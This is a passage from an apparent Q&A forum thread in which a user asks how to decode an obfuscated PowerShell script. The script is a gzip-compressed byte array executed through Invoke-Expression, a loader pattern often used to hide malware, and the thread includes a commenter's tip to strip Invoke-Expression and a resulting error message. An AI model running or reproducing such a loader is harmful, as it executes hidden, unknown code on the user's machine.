0x91, 0xe1, 0xc6, 0xe9, 0x94, 0xde, 0x3e, 0x00, 0x57, 0x6e, 0xda, 0x2b, 0x3a, 0x63, 0x28, 0xdb, 0xad, 0x4f, 0xf4, 0xf6, 0x3e, 0xa5, 0x76, 0xdb, 0xd7, 0xf9, 0x18, 0xad, 0x0d, 0xd6, 0x16, 0xf6, 0x72, 0x86, 0x7c, 0x24, 0x4f, 0xad, 0xae, 0xd5, 0x61, 0xe5, 0xd0, 0x38, 0xaa, 0x9d, 0x1b, 0x2e, 0xb2, 0xb6, 0x6d, 0x47, 0xdb, 0xa8, 0x4e, 0xd0, 0x4a, 0xa3, 0xe5, 0x9d, 0xa6, 0x35, 0xeb, 0x4b, 0xe6, 0x6e, 0x6b, 0xf9, 0x2f, 0x73, 0xb5, 0x73, 0xdf, 0x0a, 0xc5, 0xee, 0xd6, 0xec, 0xa0, 0x61, 0x67, 0x5e, 0x3f, 0xf4, 0x3a, 0x77, 0xde, 0x62, 0xbd, 0x18, 0xad, 0x1a, 0xd9, 0x1d, 0x97, 0xdc, 0x4f, 0x2d, 0xb6, 0x69, 0xbc, 0xde, 0x04, 0x1b, 0xb9, 0x49, 0x4d, 0x70, 0x7f, 0x49, 0x1d, 0xd2, 0x7a, 0x7b, 0x36, 0x91, 0x38, 0x4e, 0x5b, 0x1b, 0x06, 0xd5, 0x97, 0x04, 0xaa, 0xa5, 0xf7, 0x4c, 0xe0, 0xa9, 0xf2, 0x20, 0x09, 0xfc, 0x11, 0xf8, 0x4c, 0xc5, 0x5b, 0xbe, 0x21, 0x6e, 0x4d, 0x16, 0xdf, 0xbf, 0xd0, 0x83, 0x21, 0xf0, 0xf0, 0xe0, 0x01, 0x5f, 0x80, 0x47, 0xce, 0x8d, 0x3f, 0x3e, 0xec, 0x62, 0xe0, 0x69, 0x26, 0x0e, 0xf8, 0x4c, 0xca, 0xb9, 0x9a, 0x62, 0x3d, 0xea, 0x15, 0x5c, 0xad, 0x5b, 0xee, 0xae, 0x3f, 0x77, 0x9a, 0x93, 0xcd, 0x76, 0x11, 0xaf, 0xef, 0x9b, 0x62, 0x32, 0xa1, 0xf1, 0xd1, 0xe0, 0x52, 0xc8, 0xc7, 0xcb, 0x6a, 0x3e, 0x90, 0xd9, 0x25, 0x6b, 0x53, 0x73, 0xae, 0x2f, 0xa6, 0x1c, 0xad, 0x6d, 0xf3, 0x6a, 0x64, 0x05, 0x11, 0xf4, 0x17, 0x69, 0x7e, 0x67, 0xff, 0x41, 0xc0, 0xff, 0xad, 0x8b, 0x89, 0xb7, 0x7a, 0x03, 0x55, 0x06, 0x0a, 0x58, 0x3e, 0x7f, 0x73, 0x43, 0xe6, 0xf7, 0xfe, 0xdb, 0xca, 0xe3, 0x75, 0xfa, 0x74, 0xe9, 0xd3, 0xde, 0xde, 0x6f, 0x37, 0x29, 0x58, 0xa3, 0x5b, 0x79, 0xed, 0x2a, 0x56, 0xf6, 0xfa, 0xbb, 0x8a, 0xf5, 0x59, 0xf3, 0x23, 0xea, 0x51, 0xfc, 0xa2, 0xbb, 0x50, 0xc9, 0xa0, 0x81, 0xb9, 0x5c, 0x3f, 0x5c, 0x10, 0x71, 0xe7, 0x36, 0x64, 0x16, 0x38, 0xb9, 0x46, 0xa5, 0xf2, 0x71, 0xe7, 0xfc, 0x8a, 0x22, 0x1f, 0xb9, 0xd0, 0x55, 0x42, 0xdf, 0x79, 0x29, 0xda, 0x8c, 0xeb, 0x06, 0x46, 0xde, 0x38, 0x7d, 0xd2, 0xc1, 0x40, 0x1b, 0x77, 0x6a, 0xae, 0x9e, 0xe0, 0x72, 0xd2, 0x60, 0x48, 0x37, 0x3e, 0x1c, 0x91, 0xc4, 0x9b, 0x20, 0x74, 0x4b, 0xa7, 0x98, 0x36, 0x89, 0x65, 0x15, 0xcd, 0xc5, 0x39, 0xc2, 0x4b, 0x8f, 0x75, 0x11, 0xfc, 0xf2, 0x65, 0x0d, 0xe1, 0x55, 0xdf, 0x81, 0x28, 0x20, 0xdf, 0xc6, 0x2f, 0x55, 0x82, 0x4a, 0x69, 0x8a, 0xa2, 0xf2, 0xff, 0x26, 0x45, 0x96, 0x7e, 0x1f, 0x96, 0x7e, 0x10, 0x66, 0x95, 0x37, 0x73, 0xd5, 0xbc, 0xb9, 0x7a, 0xe7, 0xc9, 0xfb, 0x9d, 0xdc, 0x62, 0x27, 0xf2, 0x8c, 0x7e, 0x94, 0xf8, 0x1e, 0xfa, 0x3f, 0x26, 0xe0, 0xa7, 0x4d, 0xff, 0x3b, 0xb4, 0x39, 0x78, 0x45, 0x7f, 0xf6, 0x06, 0x5d, 0xe1, 0xd0, 0xc7, 0x78, 0x91, 0xa5, 0xf2, 0xb7, 0x52, 0x89, 0xb7, 0x88, 0x77, 0xf3, 0xb1, 0x73, 0x84, 0xaf, 0x0f, 0xb4, 0x23, 0x3a, 0x05, 0xf7, 0x62, 0xa0, 0x39, 0xbe, 0xdd, 0x06, 0x1b, 0xf8, 0x54, 0x29, 0xee, 0xde, 0xca, 0xb5, 0x4e, 0x12, 0x3c, 0xbb, 0x24, 0xae, 0x75, 0xe2, 0x07, 0x71, 0x0b, 0xe1, 0x31, 0x31, 0xdd, 0x80, 0xef, 0x95, 0xc8, 0x4e, 0xf2, 0x8b, 0x98, 0x38, 0x7d, 0x7e, 0x7d, 0x27, 0x0e, 0xba, 0x73, 0x52, 0xfc, 0x4e, 0xc8, 0xc8, 0x40, 0xd0, 0x3e, 0xdf, 0x8e, 0x83, 0x0d, 0xb0, 0x14, 0x41, 0x3f, 0x95, 0x9b, 0x2e, 0x8c, 0xe4, 0xc2, 0x30, 0xf7, 0x37, 0x4e, 0x00, 0x4c, 0x87, 0xcf, 0x0d, 0x00, 0x00)
Invoke-Expression(New-Object IO.StreamReader(New-Object IO.Compression.gzipstream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd()

thanks in advance- zsolt

Comment: "when I tried I got error related this." - post the full error message then. FWIW you should be able to decode it by simply removing `Invoke-Expression` from the "formatted script"

Comment: thanks Mathias this I got:

Comment: New-Object IO.StreamReader(New-Object IO.Compression.gzipstream($s, [IO.Compression.CompressionMode]::Decompress)).ReadToEnd()
New-Object : Cannot find an overload for "GZipStream" and the argument count: "2".
At line:1 char:28
+ ... treamReader(New-Object IO.Compression.gzipstream($s, [IO.Compression. ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodException
    + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand